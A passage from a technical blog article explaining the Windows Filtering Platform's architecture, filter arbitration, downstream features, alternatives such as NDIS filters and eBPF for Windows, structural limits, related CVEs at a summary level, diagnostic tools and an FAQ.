console.log(composeAcrossSublayers({ dst: '203.0.113.5' }, sublayerVerdicts)); // -> { decision: 'Block', by: 'EDR-veto' } (hard block at priority 100)

console.log(composeAcrossSublayers({ dst: '198.51.100.7' }, sublayerVerdicts)); // -> { decision: 'Block', by: 'block-default' } (soft permit overridden by hard block) `}

Key idea: Two competing Windows security products coexist on the same host because each one owns its own sublayer, with its own weight neighbourhood. Within a sublayer the BFE picks one winner using "first matching Permit or Block stops evaluation." Across sublayers the BFE composes those winners using "Block overrides Permit, hard actions are final, soft actions can be overridden." Pre-Vista, Windows had filters. Post-Vista, Windows has arbitration.

The engine arbitrates filters deterministically and separates condition-match (the filter) from action (the callout). What does the modern surface look like, in 2026, with two decades of features bolted on top?

6. The Modern WFP Surface

It is 2026. WFP is twenty years old, has never been replaced, and ships under more components than any other Windows networking primitive. Here is what it looks like today.

The filter engine and its kernel client

The filter engine is the same architectural piece WFP v1 shipped with: a cross-mode classifier whose kernel-mode classification path runs primarily inside NETIO.SYS and whose user-mode side runs inside the Base Filtering Engine service host process [@wfp-arch][@forshaw-2021]. Callouts and filter consumers do not link against NETIO.SYS. They link against a different binary.

The kernel-mode WFP client and export driver. Callout drivers and other kernel components link against `fwpkclnt.lib`, whose in-memory module is `fwpkclnt.sys` [@wfp-arch]. The driver is the API surface that callouts use to register, classify, and call back into the engine. The classification path itself, where filters are matched and actions chosen, runs primarily in `NETIO.SYS`. The shorthand "fwpkclnt.sys *is* the filter engine" is common in blog posts and incorrect; the two binaries do different jobs.

The BFE-vs-MpsSvc split is the second confusion to clear. bfe is the Base Filtering Engine, the platform service [@wfp-about]. MpsSvc is the Windows Defender Firewall service, one consumer of the platform. The dependency goes one way: MpsSvc depends on bfe; bfe does not depend on MpsSvc.You can verify the dependency direction on any running Windows box. Get-Service bfe, Get-Service mpssvc, then Get-Service mpssvc | Select-Object -ExpandProperty ServicesDependedOn will list BFE (among others); the reverse query on bfe lists no dependency on mpssvc. Forshaw's 2021 post documents the same arrow from the policy side: "MPSSVC converts its ruleset to the lower-level WFP firewall filters and sends them over RPC to the Base Filtering Engine (BFE) service" [@forshaw-2021].

Roughly sixty filtering layers

Microsoft's "Management Filtering Layer Identifiers" reference enumerates about sixty FWPM_LAYER_* GUIDs, organised by shim, direction (inbound, outbound, forward), stage (pre-IPsec, post-IPsec, discard), and IP version (v4 / v6) [@wfp-layers]. The reference page is dense, but reading it once teaches the structure. A small sample of representative layers:

FWPM_LAYER_INBOUND_IPPACKET_V4 and _V6. "Located in the receive path just after the IP header of a received packet has been parsed but before any IP header processing takes place. No IPsec decryption or reassembly has occurred" [@wfp-layers]. The earliest visibility a callout has into a received packet.
FWPM_LAYER_OUTBOUND_IPPACKET_V4 and _V6. The send-path twin.
FWPM_LAYER_IPFORWARD_V4 and _V6. The routing-decision point on a forwarding host [@wfp-layers].
FWPM_LAYER_INBOUND_TRANSPORT_V4 and _V6. After the TCP/UDP/ICMP header has been parsed but before payload delivery [@wfp-layers].
FWPM_LAYER_STREAM_V4 and _V6. The TCP stream layer where reassembled byte streams are visible [@wfp-layers].
FWPM_LAYER_DATAGRAM_DATA_V4 and _V6. Connectionless data delivery (UDP / ICMP) [@wfp-layers].
FWPM_LAYER_INBOUND_MAC_FRAME_ETHERNET. Added in Windows 8; the L2 hook the "What's New" page introduced [@wfp-whatsnew].

Each non-DISCARD layer has a DISCARD twin that fires when the engine has decided to drop a packet at that point. Callouts that need to log drops register at the DISCARD layer; callouts that need to inspect or modify register at the non-DISCARD twin [@wfp-layers].

ALE classification

The ALE shim sits across seven FWPM_LAYER_ALE_* filtering layers plus the two redirection layers introduced in the Windows 10 era [@wfp-ale-layers]:

RESOURCE_ASSIGNMENT -- local endpoint assignment (bind).
AUTH_LISTEN -- TCP listen.
AUTH_RECV_ACCEPT -- inbound TCP accept; inbound UDP/ICMP first datagram.
AUTH_CONNECT -- outbound TCP connect; outbound UDP/ICMP first datagram.
FLOW_ESTABLISHED -- the stateful "connection now exists" event.
RESOURCE_RELEASE, ENDPOINT_CLOSURE -- teardown.
CONNECT_REDIRECT, BIND_REDIRECT -- the Windows 10 redirection hooks.

Stateful per-flow context lives in the ALE shim. Application identity at each ALE layer is a normalized file name; user identity is a security descriptor [@wfp-ale]. That pair is what turns "block port 443 outbound" into "block port 443 outbound from chrome.exe running as user S-1-5-21-...."

In-box callouts and downstream features

The "Built-in Callout Identifiers" reference page enumerates the GUIDs of every in-box callout: the FWPM_CALLOUT_IPSEC_* family (transport, tunnel, forward-tunnel, inbound-initiate-secure, ALE-connect); FWPM_CALLOUT_WFP_TRANSPORT_LAYER_V4_SILENT_DROP and _V6_SILENT_DROP; the FWPM_CALLOUT_TCP_CHIMNEY_* callouts [@wfp-builtin-callouts]. Microsoft describes the four canonical roles a callout plays: "Deep Inspection... Packet Modification... Stream Modification... Data Logging" [@wfp-callouts].

A kernel driver that registers one or more callout functions with the filter engine. The engine invokes a callout's `classifyFn` when a filter at a layer specifies the callout's GUID as its action [@wfp-filter-engine]. Callouts implement one of four roles: deep inspection (read-only payload examination), packet modification, stream modification, or data logging [@wfp-callouts]. Every third-party network-security product on Windows that runs in the kernel ships a callout driver.

The downstream features are not peers of WFP. They are configurations of it.

Windows Defender Firewall with Advanced Security (WFAS). Microsoft Learn names this relationship verbatim: "The firewall application that is built into Windows Vista, Windows Server 2008, and later operating systems Windows Firewall with Advanced Security (WFAS) is implemented using WFP" [@wfp-start]. The MpsSvc service translates the WFAS rule database into WFP filters that live in the MPSSVC_WSH provider's sublayer [@forshaw-2021].
Windows IPsec. The Base Filtering Engine "plumbs configuration settings to other modules in the system. For example, IPsec negotiation polices go to IKE/AuthIP keying modules, filters go to the filter engine" [@wfp-about]. IPsec is not a separate stack; it is a configuration of WFP plus the IKE/AuthIP keying modules.
WinNAT and Windows container networking. The PowerShell cmdlet New-NetNat "creates a Network Address Translation (NAT) object that translates an internal network address to an external network address" [@netnat]; WinNAT, the implementation behind it, registers WFP filters to perform the translation. Windows containers use WinNAT for their default NAT switch.
Hyper-V Extensible Switch. Since Windows 8 / Server 2012, "the Hyper-V extensible switch is supported starting with NDIS 6.30 in Windows Server 2012," and the switch supports extensible-switch extensions that "bind within the extensible switch driver stack" [@hyperv-extswitch]. WFP filters and callouts can be placed at vSwitch ingress and egress [@wfp-whatsnew].
Microsoft Defender for Endpoint Network Protection. The Microsoft Learn page documents the capability: "Network Protection will block connections on all ports (not just 80 and 443)" [@mde-netprot]. The product enforces SmartScreen domain reputation across the entire process tree, not just the browser. The exact WFP-layer registration map is not publicly documented; Section 9 returns to it."The exact WFP-layer registration map for Microsoft Defender for Endpoint Network Protection is not publicly documented." This is one of the rare honest-disclosure moments in the WFP story. Microsoft has published the capability [@mde-netprot] but has not published the exact set of FWPM_LAYER_* identifiers Network Protection registers callouts at. Community reverse engineering knows fragments of the map. Section 9 treats this as an open engineering problem.
Third-party EDR network filters. CrowdStrike Falcon, SentinelOne, Cisco Secure Endpoint, ESET, Sophos, and the rest of the EDR vendor list ship WFP callout drivers as the standard kernel-side primitive for network telemetry and policy enforcement. There is no single Microsoft document that lists them. Forshaw's 2021 Project Zero post is the closest a primary source comes to acknowledging that this is how the industry has settled [@forshaw-2021].

The textbook reference for WFP architecture is *Windows Internals, Part 2*, 7th edition, by Russinovich, Solomon, Ionescu, Yosifovich, and Allievi (Microsoft Press, 2021) [@windows-internals-7th]. The book's Networking chapter walks through TCP/IP driver internals and WFP architecture together, including the filter-engine / BFE / shim taxonomy this article has used. Treat the book as the slow-read complement to the Microsoft Learn references; the chapter does not duplicate the Learn pages, it explains why the architecture chose the shape it did. Page numbers vary by printing; cite by chapter heading.

Five downstream features on one engine. So what are the alternatives, if you want to ship a kernel-mode network filter on Windows today and do not want to use WFP?

7. Competing Approaches -- LWF, eBPF, Extensible Switch, and the Azure VFP

WFP is the L3+ answer. What else is there to attach to?

NDIS Lightweight Filter (LWF). The L2 sibling. NDIS 6.0, shipped with Vista, introduced "NDIS filter drivers. Filter drivers can monitor and modify the interaction between protocol drivers and miniport drivers. Filter drivers are easier to implement and have less processing overhead than NDIS intermediate drivers" [@ndis-filter]. LWF is the modern replacement for NDIS 5.x intermediate drivers. It sits below the protocol stack, sees raw Ethernet frames, has no application identity, and is the right choice for raw L2 work: VLAN tagging, EAPoL, packet capture (Npcap, NMNT). Choose LWF over WFP when you need pre-IP visibility and no per-process identity.

A kernel filter driver registered with NDIS that monitors or modifies the path between a protocol driver and a miniport driver. LWF replaced NDIS 5.x intermediate drivers starting with NDIS 6.0 [@ndis-filter]. LWF drivers see Ethernet frames before any IP processing has happened. They cannot see application identity, since the OS does not yet know which process the frame belongs to.

Hyper-V Extensible Switch extensions. A specialised NDIS LWF profile. NDIS 6.30, Windows Server 2012. "The Hyper-V extensible switch supports an interface that allows instances of NDIS filter drivers (known as extensible switch extensions) to bind within the extensible switch driver stack... The Hyper-V extensible switch is supported starting with NDIS 6.30 in Windows Server 2012" [@hyperv-extswitch]. Extensions come in three roles -- capture, filter, and forwarding -- with one forwarding-extension slot per vSwitch. Choose extensible switch extensions for Hyper-V Network Virtualization, software-defined-networking overlays, or SR-IOV gating.

eBPF for Windows. A Microsoft-sponsored project to bring the Linux eBPF programming model to Windows. The GitHub README describes its scope as letting existing eBPF toolchains and APIs familiar from Linux be used on top of Windows, and frames the project as a work-in-progress [@ebpf-readme]. Three deployment modes: native ("PREVAIL verifier... bpf2c tool converts every instruction in the bytecode to equivalent C statements... built into a windows driver module (stored in a .sys file)... This is the preferred way of deploying eBPF programs" [@ebpf-readme]); JIT (user-mode service, "with HVCI enabled, eBPF programs cannot be JIT compiled, but can be run in the native mode" [@ebpf-readme]); and interpreter (debug only). The hooks the project exposes (XDP, BIND, SOCK_ADDR, SOCK_OPS, CGROUP_SOCK_ADDR) are the Linux-flavoured analogues of the WFP shim points. The v1.1.0 release, published in March 2026 and labelled "first stable" while still tagged Pre-release, "added hard/soft permit verdicts" to its accept and bind hooks -- explicitly mirroring the WFP FWPS_RIGHT_ACTION_WRITE model [@ebpf-releases]. The project's own pages page repeats the work-in-progress framing [@ebpf-pages]. Choose eBPF for Windows for pre-stack DDoS scrubbing or cross-platform observability prototypes; the production-readiness caveat applies.

A Microsoft-sponsored open-source project that ports the Linux eBPF execution and toolchain to Windows. The native deployment mode compiles eBPF bytecode through PREVAIL verification and the `bpf2c` translator into a signed `.sys` kernel driver, which preserves HVCI compatibility [@ebpf-readme]. As of the v1.1.0 release (March 2026), the project remains tagged Pre-release on GitHub [@ebpf-releases].

Azure VFP -- a name collision that requires disambiguation. The Azure host-SDN data plane, presented by Daniel Firestone at NSDI 2017 [@firestone-nsdi17], is called the Virtual Filtering Platform. Same initials shape as WFP. Different platform. VFP is the programmable virtual switch that runs on every Azure compute host; the NSDI 2017 abstract notes that "VFP has been deployed on >1M hosts running IaaS and PaaS workloads for over 4 years" [@firestone-nsdi17]. It uses match-action tables, layers (the word "layer" appears with a different semantic from WFP's), Unified Flow Tables, and AccelNet FPGA offload via the Generic Flow Table. VFP ships with Azure, on Azure hosts. It is not customer-buildable on a Windows desktop, and Windows desktop and Server SKUs do not run it. The platforms are unrelated despite the name overlap.

Note: The Azure Virtual Filtering Platform (VFP), introduced in Firestone's NSDI 2017 paper, is the Azure host SDN data plane and shares only an acronym shape with the Windows Filtering Platform [@firestone-nsdi17]. VFP runs on Azure hosts under the Hyper-V Extensible Switch and is the layer that powers SLB, NSGs, AccelNet, and Azure Virtual Network. It is unrelated to the WFP filter engine, BFE, or fwpkclnt.sys. If the title of your inquiry contains both names, you are almost certainly looking at one or the other; the focus-premise audit in this article's source notes flagged the original input's mention of "SecureNAT" as similar terminological drift that led to the wrong product.

Approach	Layer / scope	App identity	Best for
WFP callout driver	L3+ across approximately sixty `FWPM_LAYER_*` IDs [@wfp-layers]	Yes via ALE [@wfp-ale]	App-aware on-host filtering and EDR telemetry
NDIS LWF	L2, below the protocol stack [@ndis-filter]	No	Raw L2: capture, VLAN, EAPoL
Hyper-V Extensible Switch ext	Inside the vSwitch, NDIS 6.30+ [@hyperv-extswitch]	Per-VM, not per-process	Hyper-V network virtualization, SDN overlays
eBPF for Windows	XDP / BIND / SOCK_ADDR hooks [@ebpf-readme]	Partial	Pre-stack DDoS, cross-platform observability prototypes (Pre-release)
Azure VFP	Azure host SDN; not customer-buildable [@firestone-nsdi17]	N/A	Azure-host SDN policy (Microsoft-internal)

None of these displaces WFP for the dominant on-host case (application-identity-aware, IPsec-integrated, stateful, multi-vendor-arbitrated). And all of them share one limit -- a limit that is built into the laws of network physics, not into Microsoft's roadmap.

8. Three Ceilings -- Encryption, Offload, Kernel EoP

Three ceilings sit above WFP and every alternative listed above. None is a Microsoft bug. All are structural.

The encryption ceiling

A WFP callout at the stream layer sees plaintext only if the payload was never encrypted, or if it was encrypted by a key the kernel owns (IPsec).IPsec is the one case where the kernel does hold the keys, because the IKE/AuthIP keying modules that BFE plumbs to are themselves Windows components [@wfp-about]. Every other in-process TLS or QUIC stack keeps its keys away from the kernel. TLS 1.3 and QUIC are end-to-end encrypted from the callout's point of view; the keys are inside the application's user-mode TLS library. A callout that registers at FWPM_LAYER_STREAM_V4 and reads bytes off a Chrome HTTPS connection sees ciphertext.

The case is even sharper for QUIC. QUIC runs over UDP. From the first packet, almost all of the QUIC control plane is encrypted with a key derived from the connection's initial secret. A datagram-layer callout that wants to inspect the QUIC handshake -- not the payload, just the handshake -- cannot. Microsoft's own product team has acknowledged the limit in plain English on the Defender for Endpoint Network Protection page:

Blocking FQDNs in non-Microsoft browsers requires that QUIC and Encrypted Client Hello be disabled in those browsers. -- Microsoft Defender for Endpoint, *Network Protection* [@mde-netprot]

That sentence is the encryption ceiling in Microsoft's own words. The product can block by 5-tuple (IP, port, protocol). It cannot block by hostname inside an Edge tab over QUIC unless QUIC is disabled in that browser. The limit is information-theoretic: a kernel filter without the session keys cannot read the encrypted payload. No engineering changes in WFP can lift it. The fix lives in the browser or in a user-mode TLS-inspecting proxy.

The offload ceiling

The second ceiling came from hardware. Modern NICs do work that the kernel used to do, because doing it in hardware is faster. UDP Receive Segment Coalescing Offload, the marquee feature of NDIS 6.89 in Windows 11 24H2, is the cleanest example: "URO enables network interface cards (NICs) to coalesce UDP receive segments. NICs can combine UDP datagrams from the same flow that match a set of rules into a logically contiguous buffer. These combined datagrams are then indicated to the Windows networking stack as a single large packet" [@uro].

The "logically contiguous buffer" is the problem. A WFP callout written against the pre-URO semantics ("one indication at FWPM_LAYER_DATAGRAM_DATA_V4 is one UDP datagram") is silently wrong on a system where the NIC has coalesced several datagrams into one Network Buffer List. The callout that needs per-datagram inspection has to read NDIS_UDP_RSC_OFFLOAD_NET_BUFFER_LIST_INFO to learn the per-flow size and unfold the indication accordingly [@uro]. The mechanical bound is that work the NIC has aggregated has lost its per-packet boundary by the time the kernel sees it.

Note: A callout at FWPM_LAYER_DATAGRAM_DATA_V4 or _V6 that assumes "one NBL = one datagram" is silently wrong on Windows 11 24H2 systems with URO-capable NICs. Read the per-flow size from NDIS_UDP_RSC_OFFLOAD_NET_BUFFER_LIST_INFO and iterate. The change is documented in the URO reference page [@uro], but legacy callouts written before NDIS 6.89 will need an explicit audit.

The same shape repeats for TCP segmentation offload (TSO, LSO), receive offload (LRO, GRO), and TLS / IPsec / RDMA / VxLAN / GENEVE offload. Each one moves work to hardware. Each one weakens the kernel-filter assumption that "every packet flows past every layer."

The kernel attack surface

The third ceiling is the one that drives the CVE cadence. Every callout is a kernel module [@wfp-callouts]. Every byte that crosses the Fwpm* user-to-kernel boundary is a potential primitive for an elevation-of-privilege exploit [@nvd-2023-29368][@nvd-2024-38034]. CVE-2023-29368, published June 14, 2023, is a CWE-415 double-free in the WFP code path with a CVSS base of 7.0 (AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H), an exploitability sub-score of 1.0, and an impact sub-score of 5.9 [@nvd-2023-29368]. CVE-2024-38034, published July 9, 2024, is a CWE-190 integer overflow in the same family of code paths with a CVSS base of 7.8 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H), an exploitability sub-score of 1.8, and an impact sub-score of 5.9 [@nvd-2024-38034].

The CVSS vector difference is worth reading carefully.The 2024 vulnerability's attack-complexity dropped from AC:H to AC:L. The exploitability sub-score rose from 1.0 to 1.8 over the same window. The 2024 bug is easier to weaponise [@nvd-2023-29368][@nvd-2024-38034]. Without speculating about the trend across a longer time series, the direction of travel between these two anchor CVEs is "down, not up."

There is a structural variant of the same story that does not require any memory-safety bug at all. In August 2021, Forshaw published a Project Zero post titled "Understanding Network Access in Windows AppContainers." The post documents a default-WFP-policy configuration that allows certain low-privilege AppContainer processes to reach the network without any of the capability SIDs (internetClient, internetClientServer, privateNetworkClientServer) that the AppContainer documentation suggests are required [@forshaw-2021]. The associated Project Zero issue, 2207, was marked WontFix by Microsoft; the press coverage at SecurityAffairs reproduces the advisory body verbatim: "The default rules for the WFP connect layers permit certain executables to connect TCP sockets in AppContainers without capabilities leading to elevation of privilege... Eventually an AC process will match the 'Block Outbound Default Rule' rule if nothing else has which will block any connection attempt" [@securityaffairs-2021]. The bug is a policy composition bug, not a code bug. It exists in the way the in-box sublayers, filter weights, and default rules interact -- which is precisely the surface this article spent Section 5 explaining.

Key idea: WFP's hardest limits are not engineering choices Microsoft can rewrite. They are information-theoretic (a kernel filter without session keys cannot read what is encrypted), mechanical (hardware offloads exist to amortise work the kernel filter would have done, and aggregation destroys per-packet ground truth), and structural (every callout is a kernel module, and every Fwpm* call crosses a user-to-kernel ABI). The BFE elevation-of-privilege CVE class is the running cost of a platform sophisticated enough to host every downstream feature Windows ships.

Three ceilings. Is there a structural fix for any of them, or is this what the platform looks like forever?

9. Open Problems -- Where the Engineering Lives

Six questions are live right now. None of them has a clean answer.

QUIC inspection in the kernel. The current best partial result is to block QUIC by 5-tuple and rely on a browser's HTTP/3 fallback to TLS over TCP, where in-box inspection still works. The Defender for Endpoint Network Protection page documents the workaround verbatim: "Blocking FQDNs in non-Microsoft browsers requires that QUIC and Encrypted Client Hello be disabled in those browsers" [@mde-netprot]. Anything deeper than 5-tuple inspection on QUIC requires a user-mode proxy that terminates the QUIC connection and re-originates it, which moves the problem out of WFP.

Microsoft Defender for Endpoint's exact WFP-layer registration map. Publicly undocumented. Microsoft has published the capability and the limitations [@mde-netprot] but not the precise set of FWPM_LAYER_* GUIDs that Network Protection registers callouts at. Community reverse engineering knows fragments. A definitive map would let third-party EDR vendors avoid sublayer-priority conflicts with Defender. Whether Microsoft publishes one is a product-roadmap question.

The structural shape of the BFE EoP CVE class. Is the BFE elevation-of-privilege CVE class -- CWE-415 in 2023 [@nvd-2023-29368], CWE-190 in 2024 [@nvd-2024-38034], no public impossibility theorem either way -- tail risk inherent to the platform's policy-from-user-mode-to-kernel design, or is it addressable by an architectural fix (HVCI hardening on fwpkclnt.sys callout paths, bounded ABI contracts on the Fwpm* surface, Rust-in-Windows-kernel for new callout drivers)? The honest answer is that this is open. The integer-overflow / use-after-free class is the canonical attack surface of any user-to-kernel ABI; the question is whether Microsoft commits to a structural fix or to tail-risk-mitigation-plus-patching.

eBPF for Windows production readiness. Does it displace WFP for new kernel-mode network filters, or does it stay adjacent? The v1.1.0 release in March 2026 was framed as "first stable" while still labelled Pre-release [@ebpf-releases]. The same release added hard/soft permit verdicts to its accept and bind hooks, explicitly mirroring FWPS_RIGHT_ACTION_WRITE in WFP [@ebpf-releases]. That borrowing is a tell -- the project is converging on the WFP arbitration semantics, which suggests the long-term picture is "eBPF for Windows alongside WFP" rather than "eBPF replaces WFP." The market answer is unsettled.

Windows Defender Application Guard's egress-isolation pattern after WDAG deprecation. WDAG for Edge used a WFP-backed egress-isolation pattern to route browsing-container traffic out of an isolated network compartment. The WDAG product surface is being phased out -- Microsoft has documented that "Microsoft Defender Application Guard... is deprecated for Microsoft Edge for Business and will no longer be updated. Starting with Windows 11, version 24H2, Microsoft Defender Application Guard... is no longer available" [@mdag-deprecation]. The pattern's future on Windows -- in containers, virtualization-based security profiles, or some successor -- is undocumented as of the time of writing. Treat this paragraph as conjectural until Microsoft publishes a successor pattern.

NIC offload composability with kernel firewalls. As more pipeline elements move into the NIC -- TSO, LSO, GRO/GSO, URO [@uro], TLS offload, IPsec offload, RDMA, VxLAN, GENEVE -- the assumption that every packet flows past every WFP layer weakens. A callout that registers at FWPM_LAYER_INBOUND_TRANSPORT_V4 may never see a packet whose transport-layer work happened entirely on the NIC. The kernel-firewall design that grew up assuming software ground truth has to renegotiate that assumption release by release. NDIS 6.89's URO is the most recent example [@ndis-689]; there will be more.

"Open" in this section means engineering-open, not theory-open. There is no published impossibility theorem stating that WFP cannot be made provably safe against integer-overflow elevation-of-privilege, or that a kernel firewall cannot inspect encrypted traffic with a key-disclosure protocol, or that NIC offloads cannot be composed with kernel-side filters by sharing flow state. The practical question, in every case, is whether Microsoft and the broader Windows community invest in the structural fix or settle for tail-risk-mitigation plus patching. The answer in 2026 is "mostly the latter."

Six open problems. Now, how do you actually use the platform that has been the subject of this article?

10. The Four Ways You Touch WFP

Whether you are an administrator, a detection engineer, or a kernel driver writer, there are four canonical surfaces you actually touch. Here is the field guide.

The diagnostic surface: `netsh wfp`

Wikipedia's WFP page notes the introduction date: "Starting with Windows 7, the netsh command can diagnose of the internal state of WFP" [@wiki-wfp]. The canonical incident-response triplet is three commands long.

Note: Run these three commands, in this order, before doing anything else when a Windows host shows network-filtering behaviour you cannot explain: text netsh wfp show state > state.xml netsh wfp show filters > filters.xml netsh wfp capture start file=C:\Temp\wfp.cab :: reproduce the issue netsh wfp capture stop state.xml is the platform's current rendered configuration: every provider, sublayer, filter, and callout currently registered. filters.xml lists every filter, including effective weight and action. The .cab from netsh wfp capture is the ETW-and-state bundle that goes onto a Microsoft Support case. The netsh wfp family has been around since Windows 7 [@wiki-wfp]; it has not had a major redesign since.

A state.xml from netsh wfp show state is an XML document with one <item> per filter. Each item carries a <displayData> element with a name and description, the layer GUID, the sublayer GUID, the weight, and the action. Reading one is a matter of pattern recognition rather than parsing. The next snippet walks the structure on a hand-pasted fragment.

{ // A real-world 'netsh wfp show state' output contains many <item> elements // inside <filters>. The fragment below is a single filter, hand-pasted from // a 'show state' XML dump. const xmlFragment = \ {deadbeef-1111-2222-3333-444455556666} EDR-vendor outbound TCP inspect Vendor X deep-inspection callout filter FWPM_LAYER_ALE_AUTH_CONNECT_V4 {a0192d10-aaaa-bbbb-cccc-1234567890ab} FWP_UINT64 0x4000000000000064 FWP_ACTION_CALLOUT_INSPECTION `;

console.log(readFilter(xmlFragment)); // { // name: 'EDR-vendor outbound TCP inspect', // layer: 'FWPM_LAYER_ALE_AUTH_CONNECT_V4', // subLayer: '{a0192d10-aaaa-bbbb-cccc-1234567890ab}', // weight: '0x4000000000000064', // action: 'FWP_ACTION_CALLOUT_INSPECTION' // } `}

Five fields: name, layer, sublayer, weight, action. That is what every WFP filter resolves to. Reading a hundred of them takes an afternoon.

The administrative surface: `wf.msc`

The Microsoft Management Console snap-in is the surface most Windows users have actually clicked. Every rule created in wf.msc is translated by the MpsSvc service into a WFP filter and pushed into the BFE's MPSSVC provider sublayer over RPC, and from there into TCPIP.SYS in the kernel [@forshaw-2021]. The UI exposes a small fraction of the filter properties WFP actually models; advanced rule attributes (per-AppContainer SID, per-package family name, per-service hardening) live in the underlying filter only.

The networking surface: `New-NetNat` and Hyper-V NAT switches

The PowerShell cmdlet New-NetNat "creates a Network Address Translation (NAT) object that translates an internal network address to an external network address" [@netnat]. Each NAT object materialises as a set of WFP filters that perform the translation. Windows containers use the same machinery for their default NAT switch. The Get-NetNat, Remove-NetNat, and related cmdlets in the NetNat PowerShell module are the entry point.

The driver surface: writing a WFP callout

The WDK's "Introduction to Windows Filtering Platform Callout Drivers" page is the entry point for kernel-mode writers [@wfp-callouts]. The reference sample, WFPSampler, lives in the microsoft/Windows-driver-samples repository under network/trans/WFPSampler. The sample's description: "The WFPSampler sample driver is a sample firewall. It has a command-line interface which allows adding filters at various WFP layers with a wide variety of conditions. Additionally it exposes callout functions for injection, basic action, proxying, and stream inspection" [@wfpsampler]. The sample ships five components: WFPSampler.Exe, WFPSamplerService.Exe, WFPSamplerCalloutDriver.Sys, WFPSamplerProxyService.Exe, and the two libraries WFPSampler.Lib / WFPSamplerSys.Lib.If you install WFPSampler and the installer refuses to register without a reboot prompt, the README documents a workaround: run RunDLL32 setupapi.dll,InstallHinfSection DefaultInstall 131 wfpsampler.inf (note the 131), and RunDLL32 setupapi.dll,InstallHinfSection DefaultInstall 132 wfpsampler.inf for the corresponding uninstall codepath [@wfpsampler]. The 131/132 flags suppress the reboot prompt for the in-tree sample driver.

A WFP callout driver that originates kernel-mode network I/O should pair with Winsock Kernel.

"Winsock Kernel (WSK) is a kernel-mode Network Programming Interface (NPI)" [@wsk-intro]. WSK is the modern replacement for TDI as the kernel-mode sockets API on Windows Vista and later. Microsoft's WSK introduction makes the split explicit: "Filter drivers should implement the Windows Filtering Platform on Windows Vista, and TDI clients should implement WSK" [@wsk-intro]. WFP filters traffic. WSK opens sockets from inside the kernel. The two interfaces are siblings. Before writing a callout driver, ask: does the policy need per-packet kernel visibility, or would a user-mode service that consumes ETW events from `Microsoft-Windows-WFP` and the firewall's ETW providers be enough? Most logging and detection use cases are answered by ETW. A callout driver is justified when you need to *act on* traffic (drop, redirect, modify, inspect payload), not just *observe* it. The kernel attack surface that comes with a callout, documented in Section 8, is now yours to share once you ship.

The detection-engineering surface lives in ETW. The two providers to know are Microsoft-Windows-WFP and Microsoft-Windows-Windows Firewall With Advanced Security. Names are not enough to do the full subject justice; the cross-reference footer below points at the dedicated ETW article in this series.

You now have a mental map of every place WFP touches a Windows host -- under the firewall UI, under IPsec, under WinNAT, under the Hyper-V vSwitch, under Defender for Endpoint, under every EDR. The FAQ disarms the last eight misconceptions.

11. Frequently Asked Questions

No. WFP is the platform; the Windows Firewall (WFAS, service name `MpsSvc`) is one consumer of it. Microsoft's start page makes the relationship explicit: "Windows Firewall with Advanced Security (WFAS) is implemented using WFP" [@wfp-start]. The Base Filtering Engine service (`bfe`) hosts the user-mode side of WFP and accepts policy from `MpsSvc` over RPC [@forshaw-2021]. Two user-mode services and a kernel-mode classification path, one platform. No. `fwpkclnt.sys` is the kernel-mode WFP client and export driver. Callout drivers link against `fwpkclnt.lib`, whose in-memory form is `fwpkclnt.sys` [@wfp-arch]. The classification path -- the code that walks sublayers and filters -- runs primarily inside `NETIO.SYS`, as Forshaw documents in his Project Zero post [@forshaw-2021]. The shorthand "`fwpkclnt.sys` is the filter engine" is common online and incorrect. No. BFE (service name `bfe`) is the Base Filtering Engine -- the platform service that controls WFP and plumbs configuration to other modules, including IPsec keying [@wfp-about]. `MpsSvc` is the Windows Defender Firewall service. `MpsSvc` depends on `bfe`; the dependency is not reciprocal [@forshaw-2021]. No. WFP callouts see plaintext only for non-IPsec, non-TLS payloads, or for IPsec traffic where the kernel holds the keys. TLS 1.3 and QUIC are end-to-end encrypted from a callout's perspective; the keys live in user-mode TLS libraries inside the application. Microsoft's own Defender for Endpoint Network Protection documentation acknowledges the limit: "Blocking FQDNs in non-Microsoft browsers requires that QUIC and Encrypted Client Hello be disabled in those browsers" [@mde-netprot]. Section 8 calls this the encryption ceiling. No. SecureNAT is an ISA Server / Forefront Threat Management Gateway concept, retired with TMG. The modern Windows-host NAT on WFP is **WinNAT**, managed by the `New-NetNat` PowerShell cmdlet [@netnat]. Windows containers use WinNAT for their default NAT switch. The original input scope that informed this article erroneously referenced "SecureNAT" as a WFP consumer; the focus-premise audit corrected it to WinNAT before drafting began. No. WSK is **Winsock Kernel**. Microsoft Learn's introduction is unambiguous: "Winsock Kernel (WSK) is a kernel-mode Network Programming Interface (NPI)" [@wsk-intro]. The two-letter prefix is "Winsock," the original Windows Sockets API brand, not "Windows Sockets." No. CVE-2024-21318 is a Microsoft SharePoint Server deserialization remote code execution vulnerability, unrelated to the Base Filtering Engine. The 2024 WFP elevation-of-privilege vulnerability is **CVE-2024-38034**: a CWE-190 integer overflow with a CVSS base of 7.8 [@nvd-2024-38034]. The article's source-verification stage flagged the original scope's CVE attribution error before drafting; the article tracks CVE-2024-38034 and CVE-2023-29368 as the two anchor BFE CVEs. Only at the 5-tuple level (IP, port, protocol) before or after a connection establishes. Once a QUIC connection is up, the encryption ceiling applies and the kernel has no key for the encrypted payload [@mde-netprot]. FQDN-level blocking of QUIC over Network Protection requires QUIC to be disabled in the browser, per Microsoft's own troubleshooting guide [@mde-netprot]. Deep inspection of QUIC content from the kernel is not possible with WFP alone.

See also. The Microsoft-Windows-WFP and Microsoft-Windows-Windows Firewall ETW providers are how detection-engineering teams see WFP from outside the kernel; the dedicated ETW article in this series goes deeper on the provider names, manifests, and parsing. The Antimalware Scan Interface (AMSI) sits on the process-side path that complements WFP's network-side path; the two are siblings, not substitutes. And the \Device\Ipfilterdriver device object that this article retired in Section 3 lives in the Windows Object Manager namespace, whose architecture is the subject of the Object Manager article in this series.

ETW: How Windows 2000's Performance Hack Became the EDR Substrate

noreply@paragmali.com (Parag Mali) — Mon, 11 May 2026 00:00:00 GMT

